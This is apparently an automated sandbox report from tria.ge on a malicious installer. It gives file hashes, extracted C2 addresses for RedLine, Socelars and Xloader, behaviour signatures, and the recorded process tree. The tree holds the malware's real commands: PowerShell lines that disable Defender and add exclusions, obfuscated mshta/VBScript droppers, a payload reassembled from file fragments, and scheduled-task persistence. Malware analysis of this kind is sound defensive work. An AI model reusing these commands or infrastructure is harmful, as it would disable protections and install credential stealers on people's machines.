Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Resubmissions
28/10/2021, 15:53
211028-tbqhfabhb2 1028/10/2021, 05:27
211028-f5paksheak 1027/10/2021, 14:29
211027-rt28vafah7 10Analysis
-
max time kernel
1295s -
max time network
1776s -
submitted
01/01/1970, 00:00
General
-
Target
setup_installer.exe
-
Size
4.6MB
-
MD5
b356bccf8b9aff2897ecc42970367f44
-
SHA1
fe06861ac4952834ddc290dd5e0e7f36c8adc018
-
SHA256
b9325691870376c72e29be06648c8106ceefd9a94dbbfbee9a4fc2b76fc9b6d3
-
SHA512
7fc510e5575e36919c302ff053eef6f7cb5700e9e011fb5d85dd80c5ec9c97664dcad8b6607b68b10daf8a6fbc584ff1218c30e541431fd32570da8553c662b7
Score
10/10
Malware Config
Extracted
Family
socelars
C2
http://www.iyiqian.com/
http://www.hbgents.top/
http://www.rsnzhy.com/
http://www.efxety.top/
Extracted
Family
redline
Botnet
chris
C2
194.104.136.5:46013
Extracted
Family
redline
Botnet
media26
C2
91.121.67.60:23325
Extracted
Family
xloader
Version
2.5
Campaign
s0iw
C2
http://www.kyiejenner.com/s0iw/
Decoy
ortopediamodelo.com
orimshirts.store
universecatholicweekly.info
yvettechan.com
sersaudavelsempre.online
face-booking.net
europeanretailgroup.com
umofan.com
roemahbajumuslim.online
joyrosecuisine.net
3dmaker.house
megdb.xyz
stereoshopie.info
gv5rm.com
tdc-trust.com
mcglobal.club
choral.works
onlineconsultantgroup.com
friscopaintandbody.com
midwestii.com
Signatures
-
Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
-
Formbook
Formbook is a data stealing malware which is capable of stealing data.
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
Process spawned unexpected child process 7 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 4 IoCs
-
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
-
Socelars Payload 2 IoCs
-
Suspicious use of NtCreateProcessExOtherParentProcess 55 IoCs
-
Xloader
Xloader is a rebranded version of Formbook malware.
-
suricata: ET MALWARE Amadey CnC Check-In
suricata: ET MALWARE Amadey CnC Check-In
-
suricata: ET MALWARE FormBook CnC Checkin (GET)
suricata: ET MALWARE FormBook CnC Checkin (GET)
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Xloader Payload 2 IoCs
-
ASPack v2.12-2.42 7 IoCs
Detects executables packed with ASPack v2.12-2.42
-
Blocklisted process makes network request 9 IoCs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 3 IoCs
-
Executes dropped EXE 64 IoCs
-
Sets service image path in registry 2 TTPs
-
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Loads dropped DLL 64 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 18 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 3 IoCs
-
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 15 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
-
Suspicious use of SetThreadContext 13 IoCs
-
autoit_exe 2 IoCs
AutoIT scripts compiled to PE executables.
-
Drops file in Program Files directory 25 IoCs
-
Drops file in Windows directory 30 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 48 IoCs
-
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 64 IoCs
-
Kills process with taskkill 6 IoCs
-
Modifies Internet Explorer settings 1 TTPs 1 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry class 15 IoCs
-
Modifies system certificate store 2 TTPs 13 IoCs
-
Runs ping.exe 1 TTPs 1 IoCs
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
-
Suspicious behavior: MapViewOfSection 13 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 53 IoCs
-
Suspicious behavior: SetClipboardViewer 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Drops file in Program Files directory
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09f257bb7877d00b2.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed09f257bb7877d00b2.exeWed09f257bb7877d00b2.exe5⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09d8d6edfaff2ac.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed09d8d6edfaff2ac.exeWed09d8d6edfaff2ac.exe5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Pictures\Adobe Films\ntvQls6W0Z9SGx99cektYOrz.exe"C:\Users\Admin\Pictures\Adobe Films\ntvQls6W0Z9SGx99cektYOrz.exe"6⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Pictures\Adobe Films\1HegE8uhcrIdBIO7hH1TvyAE.exe"C:\Users\Admin\Pictures\Adobe Films\1HegE8uhcrIdBIO7hH1TvyAE.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\r5y3dnbVhvaXvp9RGdw3ItuO.exe"C:\Users\Admin\Pictures\Adobe Films\r5y3dnbVhvaXvp9RGdw3ItuO.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2852 -s 2407⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Pictures\Adobe Films\VGa7nZ8cXrxZh9BQV_ujGsOW.exe"C:\Users\Admin\Pictures\Adobe Films\VGa7nZ8cXrxZh9BQV_ujGsOW.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1120 -s 2887⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Pictures\Adobe Films\LpBGQQvHgLkawiCz7GISvG0P.exe"C:\Users\Admin\Pictures\Adobe Films\LpBGQQvHgLkawiCz7GISvG0P.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\Pictures\Adobe Films\m9KuYRLsEx_AWLqP1mBvqrgu.exe"C:\Users\Admin\Pictures\Adobe Films\m9KuYRLsEx_AWLqP1mBvqrgu.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
-
-
C:\Users\Admin\Pictures\Adobe Films\YVY34vY7MvHUNmB1dwA2RZLa.exe"C:\Users\Admin\Pictures\Adobe Films\YVY34vY7MvHUNmB1dwA2RZLa.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 2447⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Pictures\Adobe Films\d3iIex0FBgOMUXdGrqAqeumo.exe"C:\Users\Admin\Pictures\Adobe Films\d3iIex0FBgOMUXdGrqAqeumo.exe"6⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Windows\SysWOW64\svchost.exesvchost.exe7⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c cmd < Benvenuta.wmv7⤵
-
C:\Windows\SysWOW64\cmd.execmd8⤵
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^cumYgySQBgxPdjFKcKawUwBIsAmBYzAvcYxZIAEmtYNfVBRWjWqBCNmzERHNFdSiOXxsRGwVuTWVhjNPJDfwzYUHnqxRTQTNuGAXimtGVt$" Allora.wmv9⤵
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.19⤵
- Runs ping.exe
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comAltrove.exe.com e9⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e10⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e11⤵
-
-
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\58_Gh9EN9Lb8VWqneFpJYvOy.exe"C:\Users\Admin\Pictures\Adobe Films\58_Gh9EN9Lb8VWqneFpJYvOy.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\Pictures\Adobe Films\uosNhDevxECoZCg2RjBNDOu3.exe"C:\Users\Admin\Pictures\Adobe Films\uosNhDevxECoZCg2RjBNDOu3.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\uosNhDevxECoZCg2RjBNDOu3.exe"C:\Users\Admin\Pictures\Adobe Films\uosNhDevxECoZCg2RjBNDOu3.exe"7⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
-
-
C:\Users\Admin\Pictures\Adobe Films\gcqDb5zSn7BE_dUbS8yv3WOT.exe"C:\Users\Admin\Pictures\Adobe Films\gcqDb5zSn7BE_dUbS8yv3WOT.exe"6⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Users\Admin\Documents\hhRo_PY9JOjFbOXY45EnaDd8.exe"C:\Users\Admin\Documents\hhRo_PY9JOjFbOXY45EnaDd8.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\Y_osdk8mJb_nB0sAtjY0k2xz.exe"C:\Users\Admin\Pictures\Adobe Films\Y_osdk8mJb_nB0sAtjY0k2xz.exe"8⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\z93OlYxWWofUlmQGlsJ6Xpnz.exe"C:\Users\Admin\Pictures\Adobe Films\z93OlYxWWofUlmQGlsJ6Xpnz.exe"8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6516 -s 2409⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Pictures\Adobe Films\xNtjdlK287WgXjukzr1KQeJU.exe"C:\Users\Admin\Pictures\Adobe Films\xNtjdlK287WgXjukzr1KQeJU.exe"8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7752 -s 2809⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Pictures\Adobe Films\RU2LCevvTco4nqb5RobwPnmJ.exe"C:\Users\Admin\Pictures\Adobe Films\RU2LCevvTco4nqb5RobwPnmJ.exe"8⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\RpWh1wdDSUB28_jw5ViPc12k.exe"C:\Users\Admin\Pictures\Adobe Films\RpWh1wdDSUB28_jw5ViPc12k.exe"8⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\RpWh1wdDSUB28_jw5ViPc12k.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\Pictures\Adobe Films\RpWh1wdDSUB28_jw5ViPc12k.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\RpWh1wdDSUB28_jw5ViPc12k.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\Pictures\Adobe Films\RpWh1wdDSUB28_jw5ViPc12k.exe" ) do taskkill -f -iM "%~NxM"10⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "RpWh1wdDSUB28_jw5ViPc12k.exe"11⤵
- Kills process with taskkill
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\OQ2lnH_66KpEXpIlJZcYWeEi.exe"C:\Users\Admin\Pictures\Adobe Films\OQ2lnH_66KpEXpIlJZcYWeEi.exe"8⤵
-
C:\Users\Admin\Pictures\Adobe Films\OQ2lnH_66KpEXpIlJZcYWeEi.exe"C:\Users\Admin\Pictures\Adobe Films\OQ2lnH_66KpEXpIlJZcYWeEi.exe" -u9⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\4BF0hsnfOpSM5YBAYerqrhGy.exe"C:\Users\Admin\Pictures\Adobe Films\4BF0hsnfOpSM5YBAYerqrhGy.exe"8⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\1zQM3dQPlUbXwp5zsXr0sQ5t.exe"C:\Users\Admin\Pictures\Adobe Films\1zQM3dQPlUbXwp5zsXr0sQ5t.exe"8⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=19⤵
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--iUSIg"10⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x204,0x208,0x20c,0x1e0,0x210,0x7ffcc552dec0,0x7ffcc552ded0,0x7ffcc552dee011⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x140,0x144,0x148,0x11c,0x14c,0x7ff61e539e70,0x7ff61e539e80,0x7ff61e539e9012⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1724,3952657481001276805,10154194870497491833,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4468_1181016857" --mojo-platform-channel-handle=1740 /prefetch:811⤵
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\S1T7xVIJa2NgRifld8Xt4mJM.exe"C:\Users\Admin\Pictures\Adobe Films\S1T7xVIJa2NgRifld8Xt4mJM.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\is-LO4Q4.tmp\S1T7xVIJa2NgRifld8Xt4mJM.tmp"C:\Users\Admin\AppData\Local\Temp\is-LO4Q4.tmp\S1T7xVIJa2NgRifld8Xt4mJM.tmp" /SL5="$10414,506127,422400,C:\Users\Admin\Pictures\Adobe Films\S1T7xVIJa2NgRifld8Xt4mJM.exe"9⤵
-
C:\Users\Admin\AppData\Local\Temp\is-NR2J0.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-NR2J0.tmp\DYbALA.exe" /S /UID=270910⤵
- Drops file in Drivers directory
-
C:\Users\Admin\AppData\Local\Temp\fa-e20e9-a39-ffa88-e2c0d8208e96e\Vaefaeshamasu.exe"C:\Users\Admin\AppData\Local\Temp\fa-e20e9-a39-ffa88-e2c0d8208e96e\Vaefaeshamasu.exe"11⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kmlzuqbx.lkd\GcleanerEU.exe /eufive & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\kmlzuqbx.lkd\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\kmlzuqbx.lkd\GcleanerEU.exe /eufive13⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 11560 -s 24014⤵
- Program crash
- Enumerates system info in registry
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\o4swqr11.xh3\installer.exe /qn CAMPAIGN="654" & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\o4swqr11.xh3\installer.exeC:\Users\Admin\AppData\Local\Temp\o4swqr11.xh3\installer.exe /qn CAMPAIGN="654"13⤵
- Enumerates connected drives
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\o4swqr11.xh3\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\o4swqr11.xh3\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1635139627 /qn CAMPAIGN=""654"" " CAMPAIGN="654"14⤵
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4mfpgytr.vhw\any.exe & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\4mfpgytr.vhw\any.exeC:\Users\Admin\AppData\Local\Temp\4mfpgytr.vhw\any.exe13⤵
-
C:\Users\Admin\AppData\Local\Temp\4mfpgytr.vhw\any.exe"C:\Users\Admin\AppData\Local\Temp\4mfpgytr.vhw\any.exe" -u14⤵
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5caynxju.3ib\gcleaner.exe /mixfive & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\5caynxju.3ib\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\5caynxju.3ib\gcleaner.exe /mixfive13⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9156 -s 24014⤵
- Program crash
- Enumerates system info in registry
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pqrxobxt.bss\autosubplayer.exe /S & exit12⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV113⤵
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
-
-
-
C:\Users\Admin\Pictures\Adobe Films\5jWUy2pAopKponnGFDTz_bfA.exe"C:\Users\Admin\Pictures\Adobe Films\5jWUy2pAopKponnGFDTz_bfA.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"7⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\YgIqEx4XFbtnbNHkQWDzV0CA.exe"C:\Users\Admin\Pictures\Adobe Films\YgIqEx4XFbtnbNHkQWDzV0CA.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\Pictures\Adobe Films\eOX7_Qwa7pGMEb9wbMNxU4JT.exe"C:\Users\Admin\Pictures\Adobe Films\eOX7_Qwa7pGMEb9wbMNxU4JT.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\wbRhqAkI0KanJbU9cRxvnLg2.exe"C:\Users\Admin\Pictures\Adobe Films\wbRhqAkI0KanJbU9cRxvnLg2.exe"6⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Pictures\Adobe Films\MQe2V0B0vbPkFUADTZlxPeHQ.exe"C:\Users\Admin\Pictures\Adobe Films\MQe2V0B0vbPkFUADTZlxPeHQ.exe"6⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Company\NewProduct\cutm3.exe"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"7⤵
- Executes dropped EXE
-
-
C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"7⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6372 -s 19808⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\q3Vj1b7oC9dYMEZqxFYOF5x3.exe"C:\Users\Admin\Pictures\Adobe Films\q3Vj1b7oC9dYMEZqxFYOF5x3.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\NWXhkOhPxmA8QsCp0Poyf13J.exe"C:\Users\Admin\Pictures\Adobe Films\NWXhkOhPxmA8QsCp0Poyf13J.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose ( creAteObjecT ("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\NWXhkOhPxmA8QsCp0Poyf13J.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\NWXhkOhPxmA8QsCp0Poyf13J.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\NWXhkOhPxmA8QsCp0Poyf13J.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\NWXhkOhPxmA8QsCp0Poyf13J.exe" ) do taskkill -im "%~NxK" -F8⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -im "NWXhkOhPxmA8QsCp0Poyf13J.exe" -F9⤵
- Kills process with taskkill
-
-
C:\Users\Admin\AppData\Local\Temp\8pWB.eXE8pWB.eXe /pO_wtib1KE0hzl7U9_CYP9⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose ( creAteObjecT ("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F11⤵
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ( "WSCRIPt.SheLl" ). rUn ( "C:\Windows\system32\cmd.exe /c EcHO | seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 + HxU0.m + HR0NM.yl + _AECH.7 + ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " , 0 , TruE ) )10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c EcHO | seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 + HxU0.m + HR0NM.yl + _AECH.7 + ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY11⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>1AQCPNL9.1"12⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHO "12⤵
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe -y .\N3V4H8H.SXY12⤵
- Loads dropped DLL
-
-
-
-
-
-
-
-
